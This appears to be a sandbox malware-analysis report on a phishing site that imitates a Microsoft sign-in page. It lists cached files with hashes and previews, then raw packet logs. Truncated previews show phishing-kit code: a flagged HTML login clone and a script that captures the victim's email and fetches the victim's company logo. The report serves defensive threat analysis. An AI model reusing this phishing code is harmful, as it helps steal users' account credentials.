                                                  SHA-256:75B707D8761E2BFBD25FBD661F290A4F7FD11C48E1BF53A36DC6BD8A0034FA35
                                                  SHA-512:20DA3FE171C075635EF82F8DE57644C7A50BE45EB1207D96A51B5EADEAAC17EE830B5058D87E88501E20EC41EF897F65CEC26A0380EAF49698C6EAA5981D8483
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://manmedia.org/offic/n.page/jqueryLib.js
                                                  Preview: /*! jQuery v3.2.1 | (c) JS Foundation and other contributors | jquery.org/license */..!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){va
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2_bc3d32a696895f78c19df6c717586a5d[1].svg
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:SVG Scalable Vector Graphics image
                                                  Category:downloaded
                                                  Size (bytes):1864
                                                  Entropy (8bit):5.222032823730197
                                                  Encrypted:false
                                                  SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                  MD5:BC3D32A696895F78C19DF6C717586A5D
                                                  SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                  SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                  SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                  Preview: <svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\GetFile[1].htm
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):285
                                                  Entropy (8bit):5.677902187764918
                                                  Encrypted:false
                                                  SSDEEP:6:AYSI0MXLxu2CAIuh7FU19jtwktLFgKGeN/OXwHqiEADMDQNM+YB:zSabxiAIkBU1Lwk1FuMjt7D2QNMr
                                                  MD5:DF363642D15728BF8801DAE5E826D24D
                                                  SHA1:9C28EDAAD8E14FECF3DB768847272DD8F0163B94
                                                  SHA-256:3B093FEF80962FDEEB8325D82429186EAB0E414F53BAD02D657D7637A0C9261E
                                                  SHA-512:FD60491D599715CA3883B4E5ABFFD9618069812D2986E8EA0769F9503E8BDA6AAB4AF5797CCD39A505FD1110C4251AF85626316CD9B5DEE59FDDD083EE8E04C5
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: <head><title>Document Moved</title></head>.<body><h1>Object Moved</h1>This document may be found <a HREF="https://bms.kaseya.com/media/GetFile.ashx?enc=v0v3iBf9dJHRtCPkoYKg5wsihzS8jK%2bxLf5aFov4PDai02rukxWdluULr23lV4sTLzOvtuRnCV1xqi7E%2biXfpNb%2b6uvighFcWCFFIQBB8Xk%3d">here</a></body>
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\actions[1].js
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                  Category:downloaded
                                                  Size (bytes):3262
                                                  Entropy (8bit):5.697312232917473
                                                  Encrypted:false
                                                  SSDEEP:48:Ci7qshhTikYCCR6SusaLw5pzrzr2nskQWzBjwvs+s+ysZeeO8EjiYfO+bvMCX8D:KCPApiM3sAo7DvN4
                                                  MD5:953786798E6E895D5306E93D7C73D5C6
                                                  SHA1:DC84F8520E2640486837B10D5CF15BAB7355C5F9
                                                  SHA-256:F80523F7881DA7D827349D5C1E7615719096944955E0DEC405B811E0CDF274BB
                                                  SHA-512:982B0A70B3EE6D3B74E4D0B280804A38CA921B8D575A9CA83B9860A3F860EB3936D5E436AE02B254E860B081E83918613B6A932EB96CCE7EDAC7DAE894A7AC4F
                                                  Malicious:false
                                                  Reputation:low
                                                  IE Cache URL:https://manmedia.org/offic/n.page/actions.js
                                                  Preview: // JavaScript Document....(function(){....../*$('.ms-usertext').on('click', function(){.... $(".ms-loginbox").show(1000);.... $(".ms-loginbox2").hide(1000);....$('#email').val($('#me').text());...});............$('#FirstForm').on('submit', function(e){....console.log("Hello am here");....$('.overlay').show(1000);....$('#emailp').val($('#email').val());....$('#emailp1').val($('#emailp').val());....var er = $('#me').text($('#email').val());.. er.value = $('#email').val();.. er.readOnly = true;..........var user = $('#email').val();.....var uemail = user.split('@')[1];.....var domain = "http://logo.clearbit.com/"+uemail;..... .... $('#img1').attr("src", "https://www.google.com/s2/favicons?sz=64&domain_url="+uemail );..... $('.ms-logo2').hide();..............setTimeout(function() {.... $(".overlay").hide(1000);.... $(".ms-loginbox").hide(1000);.... $(".ms-loginbox2").show(1000);.. },2000);............e.preventDefault();...});............$('#SecondForm').o
                                                  C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):89
                                                  Entropy (8bit):4.395590914706752
                                                  Encrypted:false
                                                  SSDEEP:3:oVXUHSE3GS4s98JOGXnEHSE3GS4mn:o9U6S40qE6S4m
                                                  MD5:4BF3BA8F15C5B85F4FFC3F9E36D6C94F
                                                  SHA1:2606201AED41CDD19376137004631D12CD68222E
                                                  SHA-256:98E06F29650EA9B96B9C5781F86242CF85CE9F649AC8949A0B1401D25280666E
                                                  SHA-512:7EB46AC70FDBB4D3E137F50EAC9F7098FFA339B1AA898C7042E8D2E49027327AF349378E64DC9CED57C33EE9CDD7B88B2503AF91455361C5A90F78EDB1E6CABF
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: [2021/02/23 16:02:00.547] Latest deploy version: ..[2021/02/23 16:02:00.547] 11.211.2 ..
                                                  C:\Users\user\AppData\Local\Temp\~DF08A6A974461167F6.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):12981
                                                  Entropy (8bit):0.44377563820500354
                                                  Encrypted:false
                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9loR9lox9lWWV1fXmX:kBqoIakewX
                                                  MD5:D5E3C9203893F88011BB962AD80D737A
                                                  SHA1:D9C8BDA90F75DFB38DC788038A00D9D3E7663F22
                                                  SHA-256:7B6A02696741F8ECE286CB8949F535E636DA49D5D3F7CE428B86FEA051866F58
                                                  SHA-512:4D94895A3087ADA5FEE10660D8EBC1AD59B3A93C95CD89973DF4F6E3FB5026D1581684BCC6231A7B322E049DAA298939C28A97CDB82A02A834F54D582B98B428
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF103DA5E400CC909F.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25441
                                                  Entropy (8bit):0.3456394706198164
                                                  Encrypted:false
                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRx/9lRJ9lTb9lTb9lSSU9lSSU9laAa/9laAggZi:kBqoxxJhHWSVSEabQ
                                                  MD5:2188473FF2C6411DFC9BD09E21CB9BB5
                                                  SHA1:0DC099E00DE056BAEEE659E08C2ACD6377C7CD4A
                                                  SHA-256:043BD8C21E5F70C049556B0E26328D1EA16ED7CAB3DA7D81B2159A2407A462B2
                                                  SHA-512:FDAEAA83E7EB91853247A0D0CC4A9A0BA9AF27D454927DF91193A8F21F7C110CA6BC3EC43BAB90D74F907CF6C488B7B00CB0351DB0E2ACA282B8829E40A89810
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF40225EC25177EE78.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37087
                                                  Entropy (8bit):0.8073439230751972
                                                  Encrypted:false
                                                  SSDEEP:48:kBqoxKkA2VA2sWA2fWA2LA2wA2+A2AA28XA2JMXA2KymZ72ag3b2Z9ZMg3yZ2wrG:kBqoxKkjiWRW9eMm6EkyIm3kZr3SBqx
                                                  MD5:07B41549DF60666C34AFC8AB44F7D83A
                                                  SHA1:F3EE2B46DD23EF40ECAA7C10D73CED82AD1319A3
                                                  SHA-256:E5AF6406B2CBA15562F0CE1DCE3C913908C507B810E6E8DEBB7D149A80571FCD
                                                  SHA-512:A117E107E8FDE3E05F117A92C681493B72ED59B2EF7752E06A9BA8D31F10B732B3142D1FDD497477EA7B15EEE35F5D9DA5B737E47A7D0E1C5344EAFE9811BA52
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF53DE5289B795A3FC.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37087
                                                  Entropy (8bit):0.8060826889501502
                                                  Encrypted:false
                                                  SSDEEP:48:kBqoxKkA2VA2sWA2fWA2LA2wA2+A2vA2zXA2aMXA2dnmZ72ag3s2Z9ZMg3s2wrZ8:kBqoxKkjiWRW9eMNxP3nIm3pZr3wBq9
                                                  MD5:549B7989593C55AD479468C6431F9946
                                                  SHA1:A936B593990818CCCBBA8031464537B086BDA31A
                                                  SHA-256:DB21E85D96BCE592559BAD8B341858ABB69D2F976CCE1A820F0F80499875CE88
                                                  SHA-512:CE8E960BB3BB0E10ED9882B82100257DCDA245236091C3553BB324AC2020B1A9C9D5E4860AC4CD12CBB23A5DAB5D227542B176A0BFFE53B9C4578D7AC3A19B55
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF777BD55EE7EDB1EC.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):37091
                                                  Entropy (8bit):0.8130341619890422
                                                  Encrypted:false
                                                  SSDEEP:48:kBqoxKkA2VA2sWA2PWA2NA2HA2WA2AA2VA2C/A2CfrimZ72ag3b2Z9ZMg3b2wrZB:kBqoxKkjiWhWD58SfMEuIm3kZr37BqQ
                                                  MD5:86EBA7C3D482DDB0BB6CB1A9F941078F
                                                  SHA1:6DD7CAE1D4585C12D35FCAB3BEA4736602DF6C1D
                                                  SHA-256:29F233433A36B88D5DEB26DADB1BB3032FD4DA7E9D1ED6603224D016A0DED156
                                                  SHA-512:48467E79BA926131431F34F2F298CFC3598B824B3BA0E3AD86346A353C7F864E5313BE685FF90357EAD2E12D50273CAC02922D5053DB54C3C9FFAB48762F7C14
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DF874DF126B3AAC6A6.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):13445
                                                  Entropy (8bit):0.7394554772018571
                                                  Encrypted:false
                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9loKLP9loKLP9lWKL4+c+Hv9dTodT0T:kBqoIKsKyKb7f66
                                                  MD5:DE49C55E044A5418CE10304252C27F99
                                                  SHA1:3BF28225F7B2A531B11B71A26624F71417B6BF45
                                                  SHA-256:79A0170053D37E856546BB45319120475CD933F309532F7DF616568AF5936E36
                                                  SHA-512:D9842F2DAB72FC2EFB2B219AE2166EFACA5E1133480B8735C35AEABDC41436FFCC181A3A134492BA24DE461A6CF9EB5E497E777BEC976B17A3C0C99DDBBCF988
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\~DFA5536591CEF1A655.TMP
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):29989
                                                  Entropy (8bit):0.32748736048125066
                                                  Encrypted:false
                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwu9lwBk9l2I/9l2g9ls:kBqoxKAuvScS+B/I+hwy
                                                  MD5:9B18CA3CC35B37CECFC610420B5334CC
                                                  SHA1:F095D72BDB6E80738497B4009D24C3AE7E708E40
                                                  SHA-256:574D388CECAE463DCA776ED97B3EBB0A05B7436B2B090157B227B234F8B3A0FA
                                                  SHA-512:D3A4CCAEF187DD135873D95DEAA0702EC4DF209C57F777ACCC5B8493294785378337139B4C729B6BFC13F82C6C2ADB1F494F3AFBB0B65B7BF840CF1C21F32DA6
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial
                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                  File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):255366
                                                  Entropy (8bit):6.093517370301889
                                                  Encrypted:false
                                                  SSDEEP:6144:SWqmT2RmEb2oUp9M5WnwGJUQo7xKOFqqbgvHzy8H0WqmT2RmEb2oUp9M5WnwGJUh:8WM5LGk1kcWM5LGk1km
                                                  MD5:99A747B517553FEDEA4E383A3B257FB3
                                                  SHA1:A1CED03F68CAFEEAED72CC4184788109B1500954
                                                  SHA-256:FC09B0D19EE905B6CDEC8D0FC94ED424EDBA006BE87F702834D85176E703BE12
                                                  SHA-512:04D37CEFDBA3998BC71ECBBCF2CDBB4E9F6FDD10A2E27E1A8B57FDAA19546DC49851D58A0ABB0A57A31B1F43C793AADBF567D423F8997A694547DF88C88A10B8
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_HtmlPhish_10, Description: Yara detected HtmlPhish_10, Source: C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial, Author: Joe Security
                                                  Reputation:low
                                                  Preview: ....<html dir="ltr" class="" lang="en">....<head>.. <title>Sign in to your account</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. <meta name="PageID" content="ConvergedSignIn">.. <meta name="SiteID" content="">.. <meta name="ReqLC" content="1033">.. <meta name="LocLC" content="en-US">.. <meta name="title" content="ES6-CrawlerDetect">.. .... <link rel="shortcut icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">..<link rel="stylesheet" href="https://manmedia.org/offic/n.page/style.css" />.. <meta name="robots" content="none">..<script type="text/javascript" src="https://manmedia.org/of
                                                  C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html.a41uhm1.partial:Zone.Identifier
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:gAWY3n:qY3n
                                                  MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                  SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                  SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                  SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: [ZoneTransfer]..ZoneId=3..
                                                  C:\Users\user\Downloads\46f3fddd-165c-4cd8-9412-436cd19deef5.html:Zone.Identifier
                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:modified
                                                  Size (bytes):3
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:RW:w
                                                  MD5:310DCBBF4CCE62F762A2AAA148D556BD
                                                  SHA1:43814346E21444AAF4F70841BF7ED5AE93F55A9D
                                                  SHA-256:556D7DC3A115356350F1F9910B1AF1AB0E312D4B3E4FC788D2DA63668F36D017
                                                  SHA-512:5E3155774D39D97C5F9E17C108C2B3E0485A43AE34EBD196F61A6F8BF732EF71A49E5710594CFC7391DB114EDF99F5DA3ED96EF1D6CA5E598E85F91BD41E7EEB
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: 333

                                                  Static File Info

                                                  No static file info

                                                  Network Behavior

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 23, 2021 16:02:02.050968885 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.052453995 CET49720443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.171178102 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.171305895 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.172544003 CET4434972052.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.175298929 CET49720443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.178323030 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.178632975 CET49720443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.298767090 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.298840046 CET4434972052.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.301035881 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.301074028 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.301100016 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.301126003 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.301152945 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.301244974 CET4434972052.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.301265955 CET4434972052.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.301271915 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.301285982 CET4434972052.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.301310062 CET4434972052.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.301347017 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.301357031 CET49720443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.301426888 CET49720443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.378355980 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.378956079 CET49720443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.387079954 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.387329102 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.387911081 CET49720443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.500047922 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.500185013 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.500305891 CET4434972052.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.500950098 CET49720443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.501323938 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.502074957 CET49720443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.507334948 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.507468939 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.508116961 CET4434972052.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.508233070 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.508233070 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.508290052 CET49720443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.508306026 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.514368057 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.634269953 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.663181067 CET4434972052.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.732990026 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.733036041 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.733051062 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.733073950 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.733095884 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.733117104 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.733136892 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.733139992 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.733165026 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.733194113 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.733206987 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.733216047 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.733243942 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.733273983 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.854816914 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.854855061 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.854876041 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.854897022 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.854919910 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.854943037 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.854967117 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.854978085 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.854988098 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855010986 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855032921 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855051994 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.855053902 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855073929 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855097055 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855098009 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.855122089 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855139971 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.855145931 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855169058 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855170012 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.855190992 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855214119 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855216980 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.855237007 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855261087 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.855264902 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.855299950 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.975019932 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.975071907 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.975092888 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.975115061 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.975138903 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.975161076 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.975163937 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.975184917 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.975193024 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.975208044 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.975229979 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.975250959 CET4434971952.144.52.222192.168.2.6
                                                  Feb 23, 2021 16:02:02.975269079 CET49719443192.168.2.652.144.52.222
                                                  Feb 23, 2021 16:02:02.975274086 CET4434971952.144.52.222192.168.2.6

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 23, 2021 16:01:52.619389057 CET6204453192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:01:52.668191910 CET53620448.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:01:53.007054090 CET6379153192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:01:53.068615913 CET53637918.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:01:53.756910086 CET6426753192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:01:53.807135105 CET53642678.8.8.8192.168.2.6
                                                  Feb 23, 2021 16:01:54.761374950 CET4944853192.168.2.68.8.8.8
                                                  Feb 23, 2021 16:01:54.814598083 CET53494488.8.8.8192.168.2.6
